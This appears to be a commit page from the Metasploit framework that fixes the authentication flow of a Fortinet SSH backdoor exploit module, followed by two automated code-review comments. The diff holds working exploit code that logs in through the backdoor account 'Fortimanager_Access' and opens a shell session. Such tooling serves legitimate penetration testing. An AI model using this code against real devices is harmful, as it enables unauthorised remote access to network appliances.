
Finally fix "Unknown admin user ''" after 2yrs

The failed password auth was necessary after all. I misread the PoC. :'(

Apparently the password auth sets the username, while the backdoored
keyboard-interactive auth sets the password.
William Vu 1 year ago
parent
commit
3880f6a65e
2 changed files with 29 additions and 10 deletions
  1. 26
    10
      lib/msf/core/exploit/fortinet.rb
  2. 3
    0
      modules/auxiliary/scanner/ssh/fortinet_backdoor.rb

+ 26
- 10
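--- a/lib/msf/core/exploit/fortinet.rb
+++ b/lib/msf/core/exploit/fortinet.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 
+# https://www.ietf.org/rfc/rfc4252.txt
 # https://www.ietf.org/rfc/rfc4256.txt
 
 require 'net/ssh'
@@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet
     USERAUTH_INFO_RESPONSE = 61
 
     def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
-      debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
 
       send_message(userauth_request(
 =begin
-        string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
-        string    service name (US-ASCII)
-        string    "keyboard-interactive" (US-ASCII)
-        string    language tag (as defined in [RFC-3066])
-        string    submethods (ISO-10646 UTF-8)
+        string    user name
+        string    service name
+        string    "password"
+        boolean   FALSE
+        string    plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
 =end
         username,
         service_name,
-        'keyboard-interactive',
-        '',
-        ''
+        'password',
+        false,
+        password || ''
       ))
 
       loop do
@@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet
           return true
         when USERAUTH_FAILURE
           debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
-          return false
+          debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
+
+          send_message(userauth_request(
+=begin
+            string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+            string    service name (US-ASCII)
+            string    "keyboard-interactive" (US-ASCII)
+            string    language tag (as defined in [RFC-3066])
+            string    submethods (ISO-10646 UTF-8)
+=end
+            username,
+            service_name,
+            'keyboard-interactive',
+            '',
+            ''
+          ))
         when USERAUTH_INFO_REQUEST
           debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
 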
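Review bot: The USERAUTH_FAILURE branch in the third hunk no longer has an exit: the `return false` was replaced by an unconditional keyboard-interactive request, so a server that also rejects that method makes the loop resend the same request on every further failure until the peer drops the connection (whatever the rest of the loop body, which is outside the hunk, does on disconnect). Track whether the fallback has already been sent and give up on the second failure: initialise `tried_kbdint = false` just before the `loop do` in the second hunk, and open the failure branch with `return false if tried_kbdint` followed by `tried_kbdint = true` ahead of the debug/send lines. authenticate begins in the second hunk and its loop continues past the end of the third, so the closing of the loop and method are not visible here.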

+ 3
- 0
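--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -93,6 +93,9 @@ class MetasploitModule < Msf::Auxiliary
     }
 
     start_session(self, info, ds_merge, false, shell.lsock)
+
+    # XXX: Ruby segfaults if we don't remove the SSH socket
+    remove_socket(ssh.transport.socket)
   end
 
   def rport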
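Review bot: The `# XXX:` comment added above `remove_socket` records a symptom (a segfault) rather than the reason, so a later maintainer cannot tell whether the call is still required once the interpreter or framework changes. If the cause is that the framework would otherwise close a socket the live session still owns — I cannot confirm that from this hunk — say so, e.g. `# Deregister the SSH socket so framework cleanup does not close it underneath the session (Ruby otherwise segfaults)`. Note also that the call only runs after `start_session` returns; if that raises, the socket stays registered, which may or may not matter here. The enclosing method starts outside the hunk, and `ssh` is defined there.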
